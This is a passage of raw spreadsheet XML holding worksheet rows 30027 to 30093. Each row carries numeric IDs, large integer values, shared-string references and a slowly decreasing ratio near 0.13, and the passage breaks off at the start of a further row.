    <row r="30027" ht="15.75" customHeight="1">
      <c r="A30027" s="1">
        <v>9507.0</v>
      </c>
      <c r="B30027" s="2">
        <v>5.5946876E7</v>
      </c>
      <c r="C30027" s="2" t="s">
        <v>28866</v>
      </c>
      <c r="D30027" s="2">
        <v>1.0</v>
      </c>
      <c r="E30027" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30027" s="2">
        <v>0.1331236897274633</v>
      </c>
    </row>
    <row r="30028" ht="15.75" customHeight="1">
      <c r="A30028" s="1">
        <v>25243.0</v>
      </c>
      <c r="B30028" s="2">
        <v>1.3381641E7</v>
      </c>
      <c r="C30028" s="2" t="s">
        <v>28867</v>
      </c>
      <c r="D30028" s="2">
        <v>1.0</v>
      </c>
      <c r="E30028" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30028" s="2">
        <v>0.1328502415458938</v>
      </c>
    </row>
    <row r="30029" ht="15.75" customHeight="1">
      <c r="A30029" s="1">
        <v>27754.0</v>
      </c>
      <c r="B30029" s="2">
        <v>2.3102303E7</v>
      </c>
      <c r="C30029" s="2" t="s">
        <v>28868</v>
      </c>
      <c r="D30029" s="2">
        <v>1.0</v>
      </c>
      <c r="E30029" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30029" s="2">
        <v>0.1328125000000001</v>
      </c>
    </row>
    <row r="30030" ht="15.75" customHeight="1">
      <c r="A30030" s="1">
        <v>12613.0</v>
      </c>
      <c r="B30030" s="2">
        <v>3.0175195E7</v>
      </c>
      <c r="C30030" s="2" t="s">
        <v>28869</v>
      </c>
      <c r="D30030" s="2">
        <v>1.0</v>
      </c>
      <c r="E30030" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30030" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="30031" ht="15.75" customHeight="1">
      <c r="A30031" s="1">
        <v>14112.0</v>
      </c>
      <c r="B30031" s="2">
        <v>3.7781849E7</v>
      </c>
      <c r="C30031" s="2" t="s">
        <v>28870</v>
      </c>
      <c r="D30031" s="2">
        <v>1.0</v>
      </c>
      <c r="E30031" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30031" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="30032" ht="15.75" customHeight="1">
      <c r="A30032" s="1">
        <v>18520.0</v>
      </c>
      <c r="B30032" s="2">
        <v>5.3016242E7</v>
      </c>
      <c r="C30032" s="2" t="s">
        <v>28871</v>
      </c>
      <c r="D30032" s="2">
        <v>1.0</v>
      </c>
      <c r="E30032" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30032" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="30033" ht="15.75" customHeight="1">
      <c r="A30033" s="1">
        <v>995.0</v>
      </c>
      <c r="B30033" s="2">
        <v>2.2925262E7</v>
      </c>
      <c r="C30033" s="2" t="s">
        <v>28872</v>
      </c>
      <c r="D30033" s="2">
        <v>1.0</v>
      </c>
      <c r="E30033" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30033" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="30034" ht="15.75" customHeight="1">
      <c r="A30034" s="1">
        <v>5756.0</v>
      </c>
      <c r="B30034" s="2">
        <v>4.6668226E7</v>
      </c>
      <c r="C30034" s="2" t="s">
        <v>28873</v>
      </c>
      <c r="D30034" s="2">
        <v>1.0</v>
      </c>
      <c r="E30034" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30034" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="30035" ht="15.75" customHeight="1">
      <c r="A30035" s="1">
        <v>8979.0</v>
      </c>
      <c r="B30035" s="2">
        <v>5.4961337E7</v>
      </c>
      <c r="C30035" s="2" t="s">
        <v>28874</v>
      </c>
      <c r="D30035" s="2">
        <v>1.0</v>
      </c>
      <c r="E30035" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30035" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="30036" ht="15.75" customHeight="1">
      <c r="A30036" s="1">
        <v>10286.0</v>
      </c>
      <c r="B30036" s="2">
        <v>5.7636265E7</v>
      </c>
      <c r="C30036" s="2" t="s">
        <v>28875</v>
      </c>
      <c r="D30036" s="2">
        <v>1.0</v>
      </c>
      <c r="E30036" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30036" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="30037" ht="15.75" customHeight="1">
      <c r="A30037" s="1">
        <v>10976.0</v>
      </c>
      <c r="B30037" s="2">
        <v>1.7336646E7</v>
      </c>
      <c r="C30037" s="2" t="s">
        <v>28876</v>
      </c>
      <c r="D30037" s="2">
        <v>1.0</v>
      </c>
      <c r="E30037" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30037" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="30038" ht="15.75" customHeight="1">
      <c r="A30038" s="1">
        <v>11280.0</v>
      </c>
      <c r="B30038" s="2">
        <v>2.0781792E7</v>
      </c>
      <c r="C30038" s="2" t="s">
        <v>28877</v>
      </c>
      <c r="D30038" s="2">
        <v>1.0</v>
      </c>
      <c r="E30038" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30038" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="30039" ht="15.75" customHeight="1">
      <c r="A30039" s="1">
        <v>12444.0</v>
      </c>
      <c r="B30039" s="2">
        <v>2.9290297E7</v>
      </c>
      <c r="C30039" s="2" t="s">
        <v>28878</v>
      </c>
      <c r="D30039" s="2">
        <v>1.0</v>
      </c>
      <c r="E30039" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30039" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="30040" ht="15.75" customHeight="1">
      <c r="A30040" s="1">
        <v>12881.0</v>
      </c>
      <c r="B30040" s="2">
        <v>3.1977162E7</v>
      </c>
      <c r="C30040" s="2" t="s">
        <v>28879</v>
      </c>
      <c r="D30040" s="2">
        <v>1.0</v>
      </c>
      <c r="E30040" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30040" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="30041" ht="15.75" customHeight="1">
      <c r="A30041" s="1">
        <v>13269.0</v>
      </c>
      <c r="B30041" s="2">
        <v>3.4366139E7</v>
      </c>
      <c r="C30041" s="2" t="s">
        <v>28880</v>
      </c>
      <c r="D30041" s="2">
        <v>1.0</v>
      </c>
      <c r="E30041" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30041" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="30042" ht="15.75" customHeight="1">
      <c r="A30042" s="1">
        <v>13324.0</v>
      </c>
      <c r="B30042" s="2">
        <v>3.461208E7</v>
      </c>
      <c r="C30042" s="2" t="s">
        <v>28881</v>
      </c>
      <c r="D30042" s="2">
        <v>1.0</v>
      </c>
      <c r="E30042" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30042" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="30043" ht="15.75" customHeight="1">
      <c r="A30043" s="1">
        <v>13409.0</v>
      </c>
      <c r="B30043" s="2">
        <v>3.500249E7</v>
      </c>
      <c r="C30043" s="2" t="s">
        <v>28882</v>
      </c>
      <c r="D30043" s="2">
        <v>1.0</v>
      </c>
      <c r="E30043" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30043" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="30044" ht="15.75" customHeight="1">
      <c r="A30044" s="1">
        <v>16981.0</v>
      </c>
      <c r="B30044" s="2">
        <v>4.8318797E7</v>
      </c>
      <c r="C30044" s="2" t="s">
        <v>28883</v>
      </c>
      <c r="D30044" s="2">
        <v>1.0</v>
      </c>
      <c r="E30044" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30044" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="30045" ht="15.75" customHeight="1">
      <c r="A30045" s="1">
        <v>18877.0</v>
      </c>
      <c r="B30045" s="2">
        <v>5.4067481E7</v>
      </c>
      <c r="C30045" s="2" t="s">
        <v>28884</v>
      </c>
      <c r="D30045" s="2">
        <v>1.0</v>
      </c>
      <c r="E30045" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30045" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="30046" ht="15.75" customHeight="1">
      <c r="A30046" s="1">
        <v>19132.0</v>
      </c>
      <c r="B30046" s="2">
        <v>5.4785355E7</v>
      </c>
      <c r="C30046" s="2" t="s">
        <v>28885</v>
      </c>
      <c r="D30046" s="2">
        <v>1.0</v>
      </c>
      <c r="E30046" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30046" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="30047" ht="15.75" customHeight="1">
      <c r="A30047" s="1">
        <v>19375.0</v>
      </c>
      <c r="B30047" s="2">
        <v>5.5488475E7</v>
      </c>
      <c r="C30047" s="2" t="s">
        <v>28886</v>
      </c>
      <c r="D30047" s="2">
        <v>1.0</v>
      </c>
      <c r="E30047" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30047" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="30048" ht="15.75" customHeight="1">
      <c r="A30048" s="1">
        <v>21087.0</v>
      </c>
      <c r="B30048" s="2">
        <v>1.8046119E7</v>
      </c>
      <c r="C30048" s="2" t="s">
        <v>28887</v>
      </c>
      <c r="D30048" s="2">
        <v>1.0</v>
      </c>
      <c r="E30048" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30048" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="30049" ht="15.75" customHeight="1">
      <c r="A30049" s="1">
        <v>26637.0</v>
      </c>
      <c r="B30049" s="2">
        <v>1.8046118E7</v>
      </c>
      <c r="C30049" s="2" t="s">
        <v>28887</v>
      </c>
      <c r="D30049" s="2">
        <v>1.0</v>
      </c>
      <c r="E30049" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30049" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="30050" ht="15.75" customHeight="1">
      <c r="A30050" s="1">
        <v>27512.0</v>
      </c>
      <c r="B30050" s="2">
        <v>2.216527E7</v>
      </c>
      <c r="C30050" s="2" t="s">
        <v>28888</v>
      </c>
      <c r="D30050" s="2">
        <v>1.0</v>
      </c>
      <c r="E30050" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30050" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="30051" ht="15.75" customHeight="1">
      <c r="A30051" s="1">
        <v>32511.0</v>
      </c>
      <c r="B30051" s="2">
        <v>5716250.0</v>
      </c>
      <c r="C30051" s="2" t="s">
        <v>28889</v>
      </c>
      <c r="D30051" s="2">
        <v>1.0</v>
      </c>
      <c r="E30051" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30051" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="30052" ht="15.75" customHeight="1">
      <c r="A30052" s="1">
        <v>7592.0</v>
      </c>
      <c r="B30052" s="2">
        <v>5.1606302E7</v>
      </c>
      <c r="C30052" s="2" t="s">
        <v>28890</v>
      </c>
      <c r="D30052" s="2">
        <v>1.0</v>
      </c>
      <c r="E30052" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30052" s="2">
        <v>0.1324786324786325</v>
      </c>
    </row>
    <row r="30053" ht="15.75" customHeight="1">
      <c r="A30053" s="1">
        <v>1295.0</v>
      </c>
      <c r="B30053" s="2">
        <v>2.5606777E7</v>
      </c>
      <c r="C30053" s="2" t="s">
        <v>28891</v>
      </c>
      <c r="D30053" s="2">
        <v>1.0</v>
      </c>
      <c r="E30053" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30053" s="2">
        <v>0.1323232323232323</v>
      </c>
    </row>
    <row r="30054" ht="15.75" customHeight="1">
      <c r="A30054" s="1">
        <v>21371.0</v>
      </c>
      <c r="B30054" s="2">
        <v>2.1575166E7</v>
      </c>
      <c r="C30054" s="2" t="s">
        <v>28892</v>
      </c>
      <c r="D30054" s="2">
        <v>1.0</v>
      </c>
      <c r="E30054" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30054" s="2">
        <v>0.1323232323232323</v>
      </c>
    </row>
    <row r="30055" ht="15.75" customHeight="1">
      <c r="A30055" s="1">
        <v>31247.0</v>
      </c>
      <c r="B30055" s="2">
        <v>4933607.0</v>
      </c>
      <c r="C30055" s="2" t="s">
        <v>28893</v>
      </c>
      <c r="D30055" s="2">
        <v>1.0</v>
      </c>
      <c r="E30055" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30055" s="2">
        <v>0.1321548821548822</v>
      </c>
    </row>
    <row r="30056" ht="15.75" customHeight="1">
      <c r="A30056" s="1">
        <v>15274.0</v>
      </c>
      <c r="B30056" s="2">
        <v>4.2383563E7</v>
      </c>
      <c r="C30056" s="2" t="s">
        <v>28894</v>
      </c>
      <c r="D30056" s="2">
        <v>1.0</v>
      </c>
      <c r="E30056" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30056" s="2">
        <v>0.1320582877959927</v>
      </c>
    </row>
    <row r="30057" ht="15.75" customHeight="1">
      <c r="A30057" s="1">
        <v>19887.0</v>
      </c>
      <c r="B30057" s="2">
        <v>5.7277356E7</v>
      </c>
      <c r="C30057" s="2" t="s">
        <v>28895</v>
      </c>
      <c r="D30057" s="2">
        <v>1.0</v>
      </c>
      <c r="E30057" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30057" s="2">
        <v>0.1320582877959927</v>
      </c>
    </row>
    <row r="30058" ht="15.75" customHeight="1">
      <c r="A30058" s="1">
        <v>32819.0</v>
      </c>
      <c r="B30058" s="2">
        <v>6216210.0</v>
      </c>
      <c r="C30058" s="2" t="s">
        <v>28896</v>
      </c>
      <c r="D30058" s="2">
        <v>1.0</v>
      </c>
      <c r="E30058" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30058" s="2">
        <v>0.1320582877959927</v>
      </c>
    </row>
    <row r="30059" ht="15.75" customHeight="1">
      <c r="A30059" s="1">
        <v>26741.0</v>
      </c>
      <c r="B30059" s="2">
        <v>1.8296365E7</v>
      </c>
      <c r="C30059" s="2" t="s">
        <v>28897</v>
      </c>
      <c r="D30059" s="2">
        <v>1.0</v>
      </c>
      <c r="E30059" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30059" s="2">
        <v>0.1318407960199005</v>
      </c>
    </row>
    <row r="30060" ht="15.75" customHeight="1">
      <c r="A30060" s="1">
        <v>15438.0</v>
      </c>
      <c r="B30060" s="2">
        <v>4.2983761E7</v>
      </c>
      <c r="C30060" s="2" t="s">
        <v>28898</v>
      </c>
      <c r="D30060" s="2">
        <v>1.0</v>
      </c>
      <c r="E30060" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30060" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="30061" ht="15.75" customHeight="1">
      <c r="A30061" s="1">
        <v>16608.0</v>
      </c>
      <c r="B30061" s="2">
        <v>4.7052753E7</v>
      </c>
      <c r="C30061" s="2" t="s">
        <v>28899</v>
      </c>
      <c r="D30061" s="2">
        <v>1.0</v>
      </c>
      <c r="E30061" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30061" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="30062" ht="15.75" customHeight="1">
      <c r="A30062" s="1">
        <v>18878.0</v>
      </c>
      <c r="B30062" s="2">
        <v>5.4074458E7</v>
      </c>
      <c r="C30062" s="2" t="s">
        <v>28900</v>
      </c>
      <c r="D30062" s="2">
        <v>1.0</v>
      </c>
      <c r="E30062" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30062" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="30063" ht="15.75" customHeight="1">
      <c r="A30063" s="1">
        <v>19534.0</v>
      </c>
      <c r="B30063" s="2">
        <v>5.5998826E7</v>
      </c>
      <c r="C30063" s="2" t="s">
        <v>28901</v>
      </c>
      <c r="D30063" s="2">
        <v>1.0</v>
      </c>
      <c r="E30063" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30063" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="30064" ht="15.75" customHeight="1">
      <c r="A30064" s="1">
        <v>20100.0</v>
      </c>
      <c r="B30064" s="2">
        <v>9754274.0</v>
      </c>
      <c r="C30064" s="2" t="s">
        <v>28902</v>
      </c>
      <c r="D30064" s="2">
        <v>1.0</v>
      </c>
      <c r="E30064" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30064" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="30065" ht="15.75" customHeight="1">
      <c r="A30065" s="1">
        <v>21749.0</v>
      </c>
      <c r="B30065" s="2">
        <v>2.6042022E7</v>
      </c>
      <c r="C30065" s="2" t="s">
        <v>28903</v>
      </c>
      <c r="D30065" s="2">
        <v>1.0</v>
      </c>
      <c r="E30065" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30065" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="30066" ht="15.75" customHeight="1">
      <c r="A30066" s="1">
        <v>27453.0</v>
      </c>
      <c r="B30066" s="2">
        <v>2.1985098E7</v>
      </c>
      <c r="C30066" s="2" t="s">
        <v>28904</v>
      </c>
      <c r="D30066" s="2">
        <v>1.0</v>
      </c>
      <c r="E30066" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30066" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="30067" ht="15.75" customHeight="1">
      <c r="A30067" s="1">
        <v>15299.0</v>
      </c>
      <c r="B30067" s="2">
        <v>4.245028E7</v>
      </c>
      <c r="C30067" s="2" t="s">
        <v>28905</v>
      </c>
      <c r="D30067" s="2">
        <v>1.0</v>
      </c>
      <c r="E30067" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30067" s="2">
        <v>0.1315789473684211</v>
      </c>
    </row>
    <row r="30068" ht="15.75" customHeight="1">
      <c r="A30068" s="1">
        <v>6195.0</v>
      </c>
      <c r="B30068" s="2">
        <v>4.795454E7</v>
      </c>
      <c r="C30068" s="2" t="s">
        <v>28906</v>
      </c>
      <c r="D30068" s="2">
        <v>1.0</v>
      </c>
      <c r="E30068" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30068" s="2">
        <v>0.1315049226441632</v>
      </c>
    </row>
    <row r="30069" ht="15.75" customHeight="1">
      <c r="A30069" s="1">
        <v>28591.0</v>
      </c>
      <c r="B30069" s="2">
        <v>2.698128E7</v>
      </c>
      <c r="C30069" s="2" t="s">
        <v>28907</v>
      </c>
      <c r="D30069" s="2">
        <v>1.0</v>
      </c>
      <c r="E30069" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30069" s="2">
        <v>0.1313932980599648</v>
      </c>
    </row>
    <row r="30070" ht="15.75" customHeight="1">
      <c r="A30070" s="1">
        <v>31274.0</v>
      </c>
      <c r="B30070" s="2">
        <v>4949297.0</v>
      </c>
      <c r="C30070" s="2" t="s">
        <v>28861</v>
      </c>
      <c r="D30070" s="2">
        <v>1.0</v>
      </c>
      <c r="E30070" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30070" s="2">
        <v>0.1313932980599648</v>
      </c>
    </row>
    <row r="30071" ht="15.75" customHeight="1">
      <c r="A30071" s="1">
        <v>3688.0</v>
      </c>
      <c r="B30071" s="2">
        <v>3.9501086E7</v>
      </c>
      <c r="C30071" s="2" t="s">
        <v>28908</v>
      </c>
      <c r="D30071" s="2">
        <v>1.0</v>
      </c>
      <c r="E30071" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30071" s="2">
        <v>0.1312260536398468</v>
      </c>
    </row>
    <row r="30072" ht="15.75" customHeight="1">
      <c r="A30072" s="1">
        <v>16173.0</v>
      </c>
      <c r="B30072" s="2">
        <v>4.5646046E7</v>
      </c>
      <c r="C30072" s="2" t="s">
        <v>28909</v>
      </c>
      <c r="D30072" s="2">
        <v>1.0</v>
      </c>
      <c r="E30072" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30072" s="2">
        <v>0.130952380952381</v>
      </c>
    </row>
    <row r="30073" ht="15.75" customHeight="1">
      <c r="A30073" s="1">
        <v>12461.0</v>
      </c>
      <c r="B30073" s="2">
        <v>2.9379191E7</v>
      </c>
      <c r="C30073" s="2" t="s">
        <v>28910</v>
      </c>
      <c r="D30073" s="2">
        <v>1.0</v>
      </c>
      <c r="E30073" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30073" s="2">
        <v>0.1308851224105461</v>
      </c>
    </row>
    <row r="30074" ht="15.75" customHeight="1">
      <c r="A30074" s="1">
        <v>31849.0</v>
      </c>
      <c r="B30074" s="2">
        <v>5.2758623E7</v>
      </c>
      <c r="C30074" s="2" t="s">
        <v>28911</v>
      </c>
      <c r="D30074" s="2">
        <v>1.0</v>
      </c>
      <c r="E30074" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30074" s="2">
        <v>0.1308851224105461</v>
      </c>
    </row>
    <row r="30075" ht="15.75" customHeight="1">
      <c r="A30075" s="1">
        <v>3150.0</v>
      </c>
      <c r="B30075" s="2">
        <v>3.697168E7</v>
      </c>
      <c r="C30075" s="2" t="s">
        <v>28912</v>
      </c>
      <c r="D30075" s="2">
        <v>1.0</v>
      </c>
      <c r="E30075" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30075" s="2">
        <v>0.1306584362139917</v>
      </c>
    </row>
    <row r="30076" ht="15.75" customHeight="1">
      <c r="A30076" s="1">
        <v>4002.0</v>
      </c>
      <c r="B30076" s="2">
        <v>4.0901393E7</v>
      </c>
      <c r="C30076" s="2" t="s">
        <v>28913</v>
      </c>
      <c r="D30076" s="2">
        <v>1.0</v>
      </c>
      <c r="E30076" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30076" s="2">
        <v>0.1306584362139917</v>
      </c>
    </row>
    <row r="30077" ht="15.75" customHeight="1">
      <c r="A30077" s="1">
        <v>9620.0</v>
      </c>
      <c r="B30077" s="2">
        <v>5.6204261E7</v>
      </c>
      <c r="C30077" s="2" t="s">
        <v>28914</v>
      </c>
      <c r="D30077" s="2">
        <v>1.0</v>
      </c>
      <c r="E30077" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30077" s="2">
        <v>0.1306584362139917</v>
      </c>
    </row>
    <row r="30078" ht="15.75" customHeight="1">
      <c r="A30078" s="1">
        <v>11263.0</v>
      </c>
      <c r="B30078" s="2">
        <v>2.0662156E7</v>
      </c>
      <c r="C30078" s="2" t="s">
        <v>28915</v>
      </c>
      <c r="D30078" s="2">
        <v>1.0</v>
      </c>
      <c r="E30078" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30078" s="2">
        <v>0.1306584362139917</v>
      </c>
    </row>
    <row r="30079" ht="15.75" customHeight="1">
      <c r="A30079" s="1">
        <v>26795.0</v>
      </c>
      <c r="B30079" s="2">
        <v>1.8625154E7</v>
      </c>
      <c r="C30079" s="2" t="s">
        <v>28916</v>
      </c>
      <c r="D30079" s="2">
        <v>1.0</v>
      </c>
      <c r="E30079" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30079" s="2">
        <v>0.1306584362139917</v>
      </c>
    </row>
    <row r="30080" ht="15.75" customHeight="1">
      <c r="A30080" s="1">
        <v>27411.0</v>
      </c>
      <c r="B30080" s="2">
        <v>2.1815326E7</v>
      </c>
      <c r="C30080" s="2" t="s">
        <v>28917</v>
      </c>
      <c r="D30080" s="2">
        <v>1.0</v>
      </c>
      <c r="E30080" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30080" s="2">
        <v>0.1304713804713805</v>
      </c>
    </row>
    <row r="30081" ht="15.75" customHeight="1">
      <c r="A30081" s="1">
        <v>431.0</v>
      </c>
      <c r="B30081" s="2">
        <v>1.6993689E7</v>
      </c>
      <c r="C30081" s="2" t="s">
        <v>28918</v>
      </c>
      <c r="D30081" s="2">
        <v>1.0</v>
      </c>
      <c r="E30081" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30081" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="30082" ht="15.75" customHeight="1">
      <c r="A30082" s="1">
        <v>5915.0</v>
      </c>
      <c r="B30082" s="2">
        <v>4.720593E7</v>
      </c>
      <c r="C30082" s="2" t="s">
        <v>28919</v>
      </c>
      <c r="D30082" s="2">
        <v>1.0</v>
      </c>
      <c r="E30082" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30082" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="30083" ht="15.75" customHeight="1">
      <c r="A30083" s="1">
        <v>6057.0</v>
      </c>
      <c r="B30083" s="2">
        <v>4.7613459E7</v>
      </c>
      <c r="C30083" s="2" t="s">
        <v>28920</v>
      </c>
      <c r="D30083" s="2">
        <v>1.0</v>
      </c>
      <c r="E30083" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30083" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="30084" ht="15.75" customHeight="1">
      <c r="A30084" s="1">
        <v>6675.0</v>
      </c>
      <c r="B30084" s="2">
        <v>4.916561E7</v>
      </c>
      <c r="C30084" s="2" t="s">
        <v>28921</v>
      </c>
      <c r="D30084" s="2">
        <v>1.0</v>
      </c>
      <c r="E30084" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30084" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="30085" ht="15.75" customHeight="1">
      <c r="A30085" s="1">
        <v>7632.0</v>
      </c>
      <c r="B30085" s="2">
        <v>5.1764904E7</v>
      </c>
      <c r="C30085" s="2" t="s">
        <v>28922</v>
      </c>
      <c r="D30085" s="2">
        <v>1.0</v>
      </c>
      <c r="E30085" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30085" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="30086" ht="15.75" customHeight="1">
      <c r="A30086" s="1">
        <v>8497.0</v>
      </c>
      <c r="B30086" s="2">
        <v>5.404648E7</v>
      </c>
      <c r="C30086" s="2" t="s">
        <v>28923</v>
      </c>
      <c r="D30086" s="2">
        <v>1.0</v>
      </c>
      <c r="E30086" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30086" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="30087" ht="15.75" customHeight="1">
      <c r="A30087" s="1">
        <v>11011.0</v>
      </c>
      <c r="B30087" s="2">
        <v>1.7742013E7</v>
      </c>
      <c r="C30087" s="2" t="s">
        <v>28924</v>
      </c>
      <c r="D30087" s="2">
        <v>1.0</v>
      </c>
      <c r="E30087" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30087" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="30088" ht="15.75" customHeight="1">
      <c r="A30088" s="1">
        <v>11491.0</v>
      </c>
      <c r="B30088" s="2">
        <v>2.2055908E7</v>
      </c>
      <c r="C30088" s="2" t="s">
        <v>28925</v>
      </c>
      <c r="D30088" s="2">
        <v>1.0</v>
      </c>
      <c r="E30088" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30088" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="30089" ht="15.75" customHeight="1">
      <c r="A30089" s="1">
        <v>13937.0</v>
      </c>
      <c r="B30089" s="2">
        <v>3.7151481E7</v>
      </c>
      <c r="C30089" s="2" t="s">
        <v>28926</v>
      </c>
      <c r="D30089" s="2">
        <v>1.0</v>
      </c>
      <c r="E30089" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30089" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="30090" ht="15.75" customHeight="1">
      <c r="A30090" s="1">
        <v>14974.0</v>
      </c>
      <c r="B30090" s="2">
        <v>4.1376008E7</v>
      </c>
      <c r="C30090" s="2" t="s">
        <v>28927</v>
      </c>
      <c r="D30090" s="2">
        <v>1.0</v>
      </c>
      <c r="E30090" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30090" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="30091" ht="15.75" customHeight="1">
      <c r="A30091" s="1">
        <v>15043.0</v>
      </c>
      <c r="B30091" s="2">
        <v>4.1596798E7</v>
      </c>
      <c r="C30091" s="2" t="s">
        <v>28928</v>
      </c>
      <c r="D30091" s="2">
        <v>1.0</v>
      </c>
      <c r="E30091" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30091" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="30092" ht="15.75" customHeight="1">
      <c r="A30092" s="1">
        <v>15298.0</v>
      </c>
      <c r="B30092" s="2">
        <v>4.2447581E7</v>
      </c>
      <c r="C30092" s="2" t="s">
        <v>28929</v>
      </c>
      <c r="D30092" s="2">
        <v>1.0</v>
      </c>
      <c r="E30092" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30092" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="30093" ht="15.75" customHeight="1">
      <c r="A30093" s="1">
        <v>15859.0</v>
      </c>
      <c r="B30093" s="2">
        <v>4.4483449E7</v>
      </c>
      <c r="C30093" s="2" t="s">
        <v>28930</v>
      </c>
      <c r="D30093" s="2">
        <v>1.0</v>
      </c>
      <c r="E30093" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30093" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="30094" ht="15.75" customHeight="1">
